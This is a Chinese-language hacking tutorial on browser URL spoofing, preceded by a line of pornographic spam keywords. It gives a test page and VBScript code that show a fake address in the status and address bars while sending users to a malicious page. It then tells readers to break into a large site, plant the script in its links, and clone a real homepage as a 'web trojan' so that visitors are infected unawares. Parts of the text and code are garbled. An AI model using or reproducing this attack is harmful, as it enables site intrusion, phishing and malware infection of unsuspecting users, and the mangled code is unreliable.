欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

當用戶(hù)通過(guò)瀏覽器訪(fǎng)問(wèn)一個(gè)url,如果這個(gè)url是經(jīng)過(guò)以下的格式構造的，那么瀏覽器實(shí)際將訪(fǎng)問(wèn)經(jīng)過(guò)構造的惡意頁(yè)面,而用戶(hù)瀏覽器的地址欄里所顯示的將是虛假的url：
url的構造格式為：
_1][special_char]@[url_2]/ target=_blank>http://[url_1][special_char]@[url_2]
說(shuō)明：
url_1為用戶(hù)所看到的地址，地址中不可以帶/
special_char為一個(gè)特殊的字符，即ascii碼為1的字符
url_2為惡意頁(yè)面地址

利用過(guò)程

首先請看這個(gè)測試頁(yè)面：
<html>
<head>
<title>域名欺騙技術(shù)實(shí)例</title>
</head>
<body link=#0000ff alink=#0000ff vlink=#0000ff>
你可以看看這兩個(gè)鏈接有什么區別:<br>
<h1>鏈接1:<script language=vbscript src=deceive.vbs></script></h1>
<h1>鏈接2:<a href=_blank ?>www.163.com target=_blank>http://www.163.com/; target=_blank http://ww ... ;>www.163.com</a></h1>
</body>
</html>


這個(gè)網(wǎng)頁(yè)源代碼，其中鏈接1指向了一個(gè)vbs腳本，而鏈接2指向的是163站點(diǎn)。如果我們把連接一的vbs腳本改成下列代碼：
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'（以下請根據實(shí)際情況自行修改：）
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status='_blank ?>http://;&url1&dn&'
mouseout=onmouseout=javascript :window.status=''
click=onclick=javascript :navigate('&url&')
style=style=cursor:hand
tag=<span &style& &mouseover& &mouseout& &click&><font color=#0000ff><u>&text&</u></font></span>
document.write tag
'說(shuō)明：
'url1是用來(lái)欺騙用戶(hù)的地址.
'url2是實(shí)際訪(fǎng)問(wèn)的地址，可以是網(wǎng)頁(yè)木馬、惡意網(wǎng)頁(yè)等.
'text是鏈接的文字.
'注意：(以上欺騙地址及實(shí)際地址不可以加http://)
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''

現在大家看到了吧~~當我們點(diǎn)擊這個(gè)測試頁(yè)面的時(shí)候，鏈接1指向的是google.com，而且狀態(tài)欄和地址欄里都顯示_blank>http://www.163.com/，鏈接2卻指向163.com。你也許感到不可思議，但這就是域名欺騙漏洞的魅力。

我們可以想象，如果以上的測試頁(yè)面中的鏈接1指向的不是google.com，而是我們的網(wǎng)頁(yè)木馬，那就......

不過(guò)，一個(gè)普通的個(gè)人網(wǎng)站沒(méi)人會(huì )看的，這就需要我們把這種假鏈接添加到別的大網(wǎng)站的頁(yè)面之中。假設我們入侵了一個(gè)比較大的網(wǎng)站，比如網(wǎng)易。這時(shí)候就可以把它的頁(yè)面給改了。
比如有一個(gè)文字鏈接，我們就可以把代碼中的<a href=xxxxx.htm>xxxxxx</a>改為我們自己的代碼：<script language=vbscript src=deceive.vbs></script>?？吹絪rc屬性里的deceive.vbs了嗎 ？我們要編輯好這個(gè)文件，然后上傳到要修改的頁(yè)面目錄下。

這樣還不行，我們還要把自己的木馬網(wǎng)頁(yè)的界面修改一下。也就是把原來(lái)鏈接到的頁(yè)面加入到我們自己的木馬網(wǎng)頁(yè)，并且我們的木馬網(wǎng)頁(yè)里的所有鏈接等內容要和原來(lái)的頁(yè)面一樣，否則就會(huì )引起用戶(hù)的懷疑?，F在，我們把google網(wǎng)站的首頁(yè)源代碼全部復制下來(lái)，添加到我們的網(wǎng)頁(yè)木馬。把復制下來(lái)的代碼中的圖片或者是鏈接的文件都修改完整，比如logo.gif改為_(kāi)blank>/UpLoadFiles/NewsPhoto/comalogo.gif，否則網(wǎng)頁(yè)就和原來(lái)的不一樣了（圖片顯示為紅色的×，鏈接也失效），因為用戶(hù)打開(kāi)的是你的站點(diǎn)，而你的站點(diǎn)中并沒(méi)有logo.gif。都修改好后就可以保存文件了。上傳到你的網(wǎng)頁(yè)空間里。

至此，我們的工作已經(jīng)完成。喝一杯咖啡，休息一會(huì )......

當我們進(jìn)入這個(gè)網(wǎng)站后，點(diǎn)擊我們修改過(guò)的連接，你會(huì )發(fā)現和原來(lái)的頁(yè)面幾乎就一模一樣（當然，也有些細微的區別，不過(guò)一般很難覺(jué)察）。就當人家在瀏覽這個(gè)網(wǎng)頁(yè)的時(shí)候，他已經(jīng)在不知不覺(jué)中中了木馬。